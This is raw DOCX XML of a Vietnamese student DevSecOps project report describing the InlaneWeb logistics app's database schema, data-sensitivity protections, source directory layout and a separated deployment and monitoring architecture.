      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Hệ thống cơ sở dữ liệu MariaDB bao gồm CSDL chính </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (chứa các bảng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>shipments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>news</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) và CSDL phụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (chứa bảng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>debug_log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dùng trong môi trường thử nghiệm):</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erDiagram</w:t>
              <w:br/>
              <w:t xml:space="preserve">    users ||--o{ shipments : "so huu (customer_id)"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    users ||--o{ comments : "viet (user_id)"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    shipments ||--o{ comments : "chua (shipment_id)"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ports ||--o{ shipments : "cap cang (port_code)"</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    users {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int id PK</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar username UK "Ten dang nhap"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar password "Mat khau (Bcrypt Hash)"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar email "Thu dien tu ca nhan"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar role "Vai tro (customer/staff/admin)"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar api_key "Khoa API dinh danh"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar remember_token "Token ghi nho phien"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    shipments {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int id PK</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar tracking_no UK "Ma van don logistics"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar port_code FK "Ma cang den"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar status "Trang thai hanh trinh"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int customer_id FK "Khoa ngoai nguoi so huu"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    ports {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int id PK</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar code "Ma cang UN/LOCODE"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar city "Thanh pho toa lac"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar country "Quoc gia"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        decimal volume "Luu luong boc do (trieu TEU)"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    comments {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int id PK</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int shipment_id FK "Ma van don lien quan"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int user_id FK "Ma tai khoan binh luan"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        text content "Noi dung trao doi"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        datetime created_at "Thoi diem ghi nhan"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    news {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int id PK</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar title "Tieu de ban tin hang hai"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        text body "Noi dung thong bao"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        datetime published_at "Ngay phat hanh"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    credentials {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int id PK</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar username "Tai khoan noi bo"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar password_hash "Chuoi bam MD5"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar api_key "Khoa API thu nghiem"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    debug_log {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int id PK</w:t>
              <w:br/>
              <w:t xml:space="preserve">        text message "Nhat ky loi he thong"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        varchar flag "Co danh dau kiem thu"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H4"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Bảng phân loại mức độ nhạy cảm của dữ liệu trong CSDL InlaneWeb</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Tên bảng</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Trường dữ liệu</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Kiểu dữ liệu</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Phân loại dữ liệu theo NĐ 13 &amp; GDPR</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Biện pháp bảo vệ kỹ thuật bắt buộc</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users</w:t>
            </w:r>
          </w:p>
        </w:tc>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username</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VARCHAR(100)</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Dữ liệu cá nhân cơ bản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Kiểm soát quyền truy cập, chống rà quét danh sách</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users</w:t>
            </w:r>
          </w:p>
        </w:tc>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password</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VARCHAR(255)</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Dữ liệu đặc biệt nhạy cảm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Bắt buộc băm mật mã Bcrypt (Cost 12)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, cấm plaintext</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users</w:t>
            </w:r>
          </w:p>
        </w:tc>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email</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VARCHAR(150)</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Dữ liệu cá nhân cơ bản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Mã hóa truyền tải HTTPS/TLS, che giấu trong báo cáo</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users</w:t>
            </w:r>
          </w:p>
        </w:tc>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api_key</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VARCHAR(64)</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Dữ liệu xác thực nhạy cảm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Chỉ cấp phát qua phiên an toàn, thu hồi khi lộ</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shipments</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tracking_no</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VARCHAR(30)</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Dữ liệu giao dịch thương mại</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Khóa truy vấn theo đúng </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>customer_id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, ngăn IDOR</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shipments</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status</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>port_code</w:t>
            </w:r>
          </w:p>
        </w:tc>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VARCHAR</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Dữ liệu vận tải nội bộ</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Kiểm tra tham số đầu vào qua Prepared Statements</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comments</w:t>
            </w:r>
          </w:p>
        </w:tc>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content</w:t>
            </w:r>
          </w:p>
        </w:tc>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TEXT</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Dữ liệu trao đổi cá nhân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Lọc làm sạch ký tự đầu vào chống XSS và SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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credentials</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dev</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> DB)</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password_hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>api_key</w:t>
            </w:r>
          </w:p>
        </w:tc>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VARCHAR</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Dữ liệu nhạy cảm nội bộ</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Phân quyền tài khoản MySQL: tước quyền truy cập DB </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1.4. Cấu trúc cây thư mục mã nguồn toàn diện của dự án</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kho lưu trữ mã nguồn được chuẩn hóa theo mô hình dự án công nghiệp, phân định rõ ràng ranh giới giữa mã nguồn ứng dụng, hạ tầng giám sát, kịch bản tự động hóa CI/CD và tài liệu vận hành:</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PTIT-DevOps-SonarQube/</w:t>
              <w:br/>
              <w:t>├── .githooks/                          # Kiểm soát chất lượng cục bộ tại máy trạm</w:t>
              <w:br/>
              <w:t>│   └── commit-msg                      # Hook kiểm tra cú pháp Conventional Commits trước khi commit</w:t>
              <w:br/>
              <w:t>├── .github/workflows/                  # Đường ống tự động hóa DevSecOps</w:t>
              <w:br/>
              <w:t>│   └── devsecops-pipeline.yml          # Kịch bản GitHub Actions 4 Stage khép kín</w:t>
              <w:br/>
              <w:t>├── InlaneWeb/                          # Khối ứng dụng nghiệp vụ &amp; giám sát</w:t>
              <w:br/>
              <w:t>│   ├── db/                             # Cơ sở dữ liệu MariaDB</w:t>
              <w:br/>
              <w:t>│   │   ├── Dockerfile                  # Đóng gói ảnh CSDL tùy biến</w:t>
              <w:br/>
              <w:t>│   │   ├── fix-perms-entrypoint.sh     # Script khởi tạo phân quyền an toàn thư mục CSDL</w:t>
              <w:br/>
              <w:t>│   │   ├── init.sql                    # Khởi tạo lược đồ 2 CSDL (ilfreight &amp; dev) và dữ liệu mẫu</w:t>
              <w:br/>
              <w:t>│   │   └── lab.cnf                     # Cấu hình tối ưu bộ nhớ và nhật ký truy vấn MariaDB</w:t>
              <w:br/>
              <w:t>│   ├── web/                            # Ứng dụng web InlaneWeb Logistics (PHP 8.2 &amp; Apache)</w:t>
              <w:br/>
              <w:t>│   │   ├── Dockerfile                  # Đóng gói ảnh ứng dụng web đa tầng</w:t>
              <w:br/>
              <w:t>│   │   ├── php.ini                     # Cấu hình bảo mật PHP (tắt display_errors, bật opcache)</w:t>
              <w:br/>
              <w:t>│   │   ├── apache/                     # Cấu hình máy chủ web định dạng JSON log truy cập</w:t>
              <w:br/>
              <w:t>│   │   └── src/                        # Toàn bộ mã nguồn ứng dụng web PHP</w:t>
              <w:br/>
              <w:t>│   ├── monitoring/                     # Cụm hạ tầng quan sát tập trung</w:t>
              <w:br/>
              <w:t>│   │   ├── grafana/                    # Cấu hình tự động nạp nguồn dữ liệu và bảng điều khiển</w:t>
              <w:br/>
              <w:t>│   │   │   └── provisioning/dashboards/inlaneweb-overview.json  # 8 phân vùng giám sát an ninh</w:t>
              <w:br/>
              <w:t>│   │   ├── loki/                       # Cấu hình lưu trữ nhật ký Loki (TSDB &amp; Chunk retention)</w:t>
              <w:br/>
              <w:t>│   │   └── promtail/                   # Thu thập nhật ký từ Docker Socket theo thời gian thực</w:t>
              <w:br/>
              <w:t>│   ├── docker-compose.prod.yml         # Tệp điều phối khối ứng dụng web &amp; CSDL Production</w:t>
              <w:br/>
              <w:t>│   └── docker-compose.monitoring.yml   # Tệp điều phối khối hạ tầng giám sát &amp; Autoheal độc lập</w:t>
              <w:br/>
              <w:t>├── ci/                                 # Bộ công cụ kiểm định tự động (Policy-as-Code &amp; SAST)</w:t>
              <w:br/>
              <w:t>│   ├── policy_guard.py                 # Bộ gác cổng Stage 1: Kiểm soát phân nhánh và tiêu đề PR</w:t>
              <w:br/>
              <w:t>│   ├── semgrep-local-rules.yml         # Tập luật phân tích luồng dữ liệu ô nhiễm tùy biến</w:t>
              <w:br/>
              <w:t>│   ├── semgrep_report.py               # Phân tích cú pháp báo cáo JSON và tóm tắt lỗ hổng</w:t>
              <w:br/>
              <w:t>│   ├── sonarqube-quality-gate.json     # Bộ chỉ số Quality Gate chặn đứng mã lỗi Rating A</w:t>
              <w:br/>
              <w:t>│   ├── sonarqube.py                    # Khởi tạo dự án, nạp Quality Gate và kiểm tra trạng thái</w:t>
              <w:br/>
              <w:t>│   └── validate_configs.py             # Bộ thẩm định cú pháp 21 tệp cấu hình YAML/JSON</w:t>
              <w:br/>
              <w:t>├── docs/                               # Bộ tài liệu kỹ thuật hoàn chỉnh</w:t>
              <w:br/>
              <w:t>│   ├── 01-hạ tầng triển khai.md        # Đặc tả kiến trúc máy chủ VPS, mạng nội bộ và Reverse Proxy</w:t>
              <w:br/>
              <w:t>│   ├── 02-Quy tắc triển khai.md        # Quy chuẩn phân nhánh Git, commit message và cấu trúc PR</w:t>
              <w:br/>
              <w:t>│   ├── 03-Kiểm soát an ninh...md       # Chi tiết quy trình phân tích tĩnh SonarQube &amp; Semgrep</w:t>
              <w:br/>
              <w:t>│   ├── 04-Hướng dẫn cấu hình...md      # Hướng dẫn chi tiết triển khai lên Production thực tế</w:t>
              <w:br/>
              <w:t>│   ├── 05-Báo cáo bài tập lớn...md     # Báo cáo tổng kết toàn diện bài tập nhóm DevSecOps</w:t>
              <w:br/>
              <w:t>│   └── checklist.md                    # Bảng theo dõi tiến độ và đối chiếu yêu cầu môn học</w:t>
              <w:br/>
              <w:t>└── tests/                              # Bộ kiểm thử tự động của các công cụ CI</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ├── test_policy_guard.py            # Kiểm thử quy tắc kiểm tra nhánh và PR</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ├── test_sonarqube.py               # Kiểm thử giao tiếp API với máy chủ SonarQube</w:t>
              <w:br/>
              <w:t xml:space="preserve">    └── test_validate_configs.py        # Kiểm thử bộ thẩm định tệp cấu hình</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>1.2. Thiết kế tách riêng ứng dụng và cụm giám sát</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong môi trường triển khai thực tế, một sai lầm phổ biến khi mới thiết lập DevOps là gom tất cả dịch vụ ứng dụng và các công cụ giám sát vào chung một tệp Docker Compose duy nhất. Cách làm này gây ra hai vấn đề lớn:</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Mỗi khi cập nhật phiên bản web mới, toàn bộ các tiến trình giám sát và thu thập nhật ký như Promtail và Loki cũng bị khởi động lại theo, tạo ra khoảng mù giám sát đúng vào thời điểm rủi ro cao nhất của quá trình phát hành.</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Quá trình xử lý lượng lớn dữ liệu nhật ký có thể tranh chấp tài nguyên bộ nhớ và vi xử lý trực tiếp với các tiến trình xử lý giao dịch cơ sở dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để giải quyết triệt để vấn đề này, đề tài thiết kế hệ thống theo mô hình phân tách vòng đời hai nhánh độc lập:</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w:t>
              <w:br/>
              <w:t xml:space="preserve">  │              MÔ HÌNH PHÂN TÁCH VÒNG ĐỜI HAI NHÁNH ĐỘC LẬP              │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├────────────────────────────────────────────────────────────────────────┤</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                        │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │  [NHÁNH 1: CỤM HẠ TẦNG GIÁM SÁT LIÊN TỤC 24/7]                         │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Thành phần: Loki 3.0, Promtail 3.0, Grafana 11.0, Autoheal         │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Tệp điều phối: docker-compose.monitoring.yml                       │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Tần suất cập nhật: Rất thấp (chỉ cập nhật khi nâng cấp hạ tầng)    │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Đặc tính: Luôn trực tuyến 99.99%, đóng vai trò người quan sát      │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                        │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │            ▲                                                           │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │            │ Đọc nhật ký thời gian thực qua socket máy chủ Docker      │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │            │ Lắng nghe tín hiệu nhịp tim định kỳ của từng container    │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │            │                                                           │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │  [NHÁNH 2: CỤM ỨNG DỤNG WEB VÀ CƠ SỞ DỮ LIỆU]                          │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Thành phần: Ứng dụng web (ilfreight_web), Cơ sở dữ liệu MariaDB    │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Tệp điều phối: docker-compose.prod.yml                             │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Tần suất cập nhật: Thường xuyên theo từng đợt phát hành phiên bản  │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │   - Cơ chế nạp: Kéo hình ảnh đóng gói sẵn từ kho GitHub, không build   │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │                                                                        │</w:t>
              <w:br/>
              <w:t xml:space="preserve">  └────────────────────────────────────────────────────────────────────────┘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông qua việc phân lập tệp điều phối thành </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.monitoring.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.prod.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, hai khối vận hành hoàn toàn độc lập về không gian tiến trình, nhưng liên kết lỏng với nhau thông qua mạng Docker Bridge nội bộ và cơ chế chia sẻ Docker Unix Socket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>1.3. Thiết kế mạng nội bộ và Reverse Proxy bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kiến trúc mạng sản xuất được thiết lập theo mô hình đa tầng phòng thủ nhằm cô lập hoàn toàn các thành phần nhạy cảm khỏi mạng Internet công cộng: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graph TD</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User([Người dùng / Kẻ tấn công]) --&gt;|HTTPS:443 / TLS 1.3 Strict| CF[Cloudflare Edge Network &amp; WAF]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    CF --&gt;|Origin Traffic / Port 80, 443| NPM[Nginx Proxy Manager - Edge Reverse Proxy]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
